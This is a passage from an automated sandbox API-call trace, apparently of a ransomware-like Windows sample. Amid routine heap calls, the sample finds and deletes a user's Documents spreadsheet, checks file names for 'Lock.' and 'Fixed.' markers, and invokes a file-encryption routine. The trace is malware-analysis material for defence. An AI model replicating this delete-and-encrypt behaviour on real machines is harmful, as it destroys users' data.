dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0259.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0259.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0259.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0259.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf08b0 | out: hHeap=0x970000) returned 1 [0259.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0259.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0259.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0259.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0259.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0259.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0259.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0259.596] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0259.596] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0259.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0259.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0259.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0259.596] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/1L1L.xlsx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\1L1L.xlsx", lpFilePart=0x8cedf4*="1L1L.xlsx") returned 0x23 [0259.596] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\1L1L.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\1l1l.xlsx")) returned 0x20 [0259.597] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\1L1L.xlsx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bf4a770, ftCreationTime.dwHighDateTime=0x1d5f0f9, ftLastAccessTime.dwLowDateTime=0x9bf84a30, ftLastAccessTime.dwHighDateTime=0x1d5e55c, ftLastWriteTime.dwLowDateTime=0x9bf84a30, ftLastWriteTime.dwHighDateTime=0x1d5e55c, nFileSizeHigh=0x0, nFileSizeLow=0x4997, dwReserved0=0x1, dwReserved1=0x1c, cFileName="1L1L.xlsx", cAlternateFileName="1L1L~1.XLS")) returned 0xa872d0 [0259.597] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\1L1L.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\1l1l.xlsx")) returned 1 [0259.600] FindNextFileW (in: hFindFile=0xa872d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bf4a770, ftCreationTime.dwHighDateTime=0x1d5f0f9, ftLastAccessTime.dwLowDateTime=0x9bf84a30, ftLastAccessTime.dwHighDateTime=0x1d5e55c, ftLastWriteTime.dwLowDateTime=0x9bf84a30, ftLastWriteTime.dwHighDateTime=0x1d5e55c, nFileSizeHigh=0x0, nFileSizeLow=0x4997, dwReserved0=0x1, dwReserved1=0x1c, cFileName="1L1L.xlsx", cAlternateFileName="1L1L~1.XLS")) returned 0 [0259.600] FindClose (in: hFindFile=0xa872d0 | out: hFindFile=0xa872d0) returned 1 [0259.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0259.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0259.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.601] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0259.601] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0259.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0259.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0259.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0259.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0259.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0259.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0259.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0259.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0259.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0259.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0259.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0259.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0259.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0259.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0259.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48) returned 0x2e558d8 [0259.602] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/1L1L.xlsx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\1L1L.xlsx", lpFilePart=0x8cf650*="1L1L.xlsx") returned 0x23 [0259.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0259.602] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\1L1L.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\1l1l.xlsx")) returned 0xffffffff [0259.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0259.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0259.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.602] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0259.602] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.602] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0259.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0259.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0259.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0259.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0259.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0259.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0259.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0259.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9mu- e5Z.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mu- e5Z.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u- e5Z.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="- e5Z.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" e5Z.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e5Z.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5Z.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0259.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0259.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0259.603] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0259.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0259.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0259.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0259.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0259.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0259.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0259.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0259.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0259.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0259.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0259.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0259.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0259.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e79310 [0259.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0259.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9mu- e5Z.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mu- e5Z.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u- e5Z.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="- e5Z.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" e5Z.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e5Z.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5Z.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0259.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0259.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0259.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0259.605] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0259.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.605] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0259.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e78 [0259.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0259.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0259.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0259.605] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0259.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0259.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0259.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0259.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0259.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0259.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0259.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0259.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0259.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0259.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0259.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0259.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0259.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0259.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e58 [0259.606] 